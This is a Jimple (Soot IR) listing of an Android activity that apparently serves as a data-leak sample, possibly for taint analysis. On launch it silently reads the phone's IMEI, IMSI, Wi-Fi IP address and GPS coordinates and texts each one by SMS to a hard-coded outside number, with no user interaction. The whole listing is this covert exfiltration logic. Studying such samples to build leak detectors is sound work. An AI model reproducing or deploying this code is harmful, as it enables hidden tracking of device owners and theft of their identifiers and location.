public class com.example.no_buttons.MainActivity extends androidx.appcompat.app.AppCompatActivity
{
    double latitudeGPS;
    private final android.location.LocationListener locationListenerGPS;
    android.location.LocationManager locationManager;
    double longitudeGPS;
    public android.content.Intent ipcIntent;
    public android.content.Intent ipcResultIntent;

    public void <init>()
    {
        com.example.no_buttons.MainActivity $r0;
        com.example.no_buttons.MainActivity$1 $r1;

        $r0 := @this: com.example.no_buttons.MainActivity;

        specialinvoke $r0.<androidx.appcompat.app.AppCompatActivity: void <init>()>();

        $r1 = new com.example.no_buttons.MainActivity$1;

        specialinvoke $r1.<com.example.no_buttons.MainActivity$1: void <init>(com.example.no_buttons.MainActivity)>($r0);

        $r0.<com.example.no_buttons.MainActivity: android.location.LocationListener locationListenerGPS> = $r1;

        return;
    }

    protected void onCreate(android.os.Bundle)
    {
        com.example.no_buttons.MainActivity $r0;
        android.os.Bundle $r1;
        java.lang.String $r2, $r8, $r12;
        java.lang.Object $r3;
        android.location.LocationManager $r4;
        android.location.LocationListener $r5;
        android.telephony.TelephonyManager $r6;
        java.lang.StringBuilder $r7;
        android.content.Context $r9;
        android.net.wifi.WifiManager $r10;
        android.net.wifi.WifiInfo $r11;
        int $i0, $i1;
        java.lang.String[] $r13;
        double $d0;
        android.telephony.SmsManager $r14;

        $r0 := @this: com.example.no_buttons.MainActivity;

        $r1 := @parameter0: android.os.Bundle;

        specialinvoke $r0.<androidx.appcompat.app.AppCompatActivity: void onCreate(android.os.Bundle)>($r1);

        virtualinvoke $r0.<com.example.no_buttons.MainActivity: void setContentView(int)>(2131296284);

        $r3 = virtualinvoke $r0.<com.example.no_buttons.MainActivity: java.lang.Object getSystemService(java.lang.String)>("location");

        $r4 = (android.location.LocationManager) $r3;

        $r0.<com.example.no_buttons.MainActivity: android.location.LocationManager locationManager> = $r4;

        $r4 = $r0.<com.example.no_buttons.MainActivity: android.location.LocationManager locationManager>;

        $r5 = $r0.<com.example.no_buttons.MainActivity: android.location.LocationListener locationListenerGPS>;

        virtualinvoke $r4.<android.location.LocationManager: void requestLocationUpdates(java.lang.String,long,float,android.location.LocationListener)>("gps", 120000L, 10.0F, $r5);

        $r3 = virtualinvoke $r0.<com.example.no_buttons.MainActivity: java.lang.Object getSystemService(java.lang.String)>("phone");

        $r6 = (android.telephony.TelephonyManager) $r3;

        $r7 = new java.lang.StringBuilder;

        specialinvoke $r7.<java.lang.StringBuilder: void <init>()>();

        $r2 = virtualinvoke $r6.<android.telephony.TelephonyManager: java.lang.String getDeviceId()>();

        virtualinvoke $r7.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>($r2);

        virtualinvoke $r7.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>("");

        $r2 = virtualinvoke $r7.<java.lang.StringBuilder: java.lang.String toString()>();

        $r7 = new java.lang.StringBuilder;

        specialinvoke $r7.<java.lang.StringBuilder: void <init>()>();

        $r8 = virtualinvoke $r6.<android.telephony.TelephonyManager: java.lang.String getSubscriberId()>();

        virtualinvoke $r7.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>($r8);

        virtualinvoke $r7.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>("");

        $r8 = virtualinvoke $r7.<java.lang.StringBuilder: java.lang.String toString()>();

        $r9 = virtualinvoke $r0.<com.example.no_buttons.MainActivity: android.content.Context getApplicationContext()>();

        $r3 = virtualinvoke $r9.<android.content.Context: java.lang.Object getSystemService(java.lang.String)>("wifi");

        $r10 = (android.net.wifi.WifiManager) $r3;

        $r11 = virtualinvoke $r10.<android.net.wifi.WifiManager: android.net.wifi.WifiInfo getConnectionInfo()>();

        $i0 = virtualinvoke $r11.<android.net.wifi.WifiInfo: int getIpAddress()>();

        $r12 = staticinvoke <android.text.format.Formatter: java.lang.String formatIpAddress(int)>($i0);

        $r13 = newarray (java.lang.String)[5];

        $r13[0] = $r2;

        $r13[1] = $r8;

        $r13[2] = $r12;

        $d0 = $r0.<com.example.no_buttons.MainActivity: double longitudeGPS>;

        $r2 = staticinvoke <java.lang.Double: java.lang.String toString(double)>($d0);

        $r13[3] = $r2;

        $d0 = $r0.<com.example.no_buttons.MainActivity: double latitudeGPS>;

        $r2 = staticinvoke <java.lang.Double: java.lang.String toString(double)>($d0);

        $r13[4] = $r2;

        $i0 = 0;

     label1:
        $i1 = lengthof $r13;

        if $i0 >= $i1 goto label2;

        $r14 = staticinvoke <android.telephony.SmsManager: android.telephony.SmsManager getDefault()>();

        $r2 = $r13[$i0];

        virtualinvoke $r14.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("8502920020", null, $r2, null, null);

        $i0 = $i0 + 1;

        goto label1;

     label2:
        return;
    }

    public android.content.Intent getIntent()
    {
        com.example.no_buttons.MainActivity this;
        android.content.Intent $r0;

        this := @this: com.example.no_buttons.MainActivity;

        $r0 = this.<com.example.no_buttons.MainActivity: android.content.Intent ipcIntent>;

        return $r0;
    }

    public void setIntent(android.content.Intent)
    {
        com.example.no_buttons.MainActivity this;
        android.content.Intent parameter0;

        this := @this: com.example.no_buttons.MainActivity;

        parameter0 := @parameter0: android.content.Intent;

        this.<com.example.no_buttons.MainActivity: android.content.Intent ipcIntent> = parameter0;

        return;
    }

    public void setResult(int, android.content.Intent)
    {
        com.example.no_buttons.MainActivity this;
        int parameter0;
        android.content.Intent parameter1;

        this := @this: com.example.no_buttons.MainActivity;

        parameter0 := @parameter0: int;

        parameter1 := @parameter1: android.content.Intent;

        this.<com.example.no_buttons.MainActivity: android.content.Intent ipcResultIntent> = parameter1;

        return;
    }
}
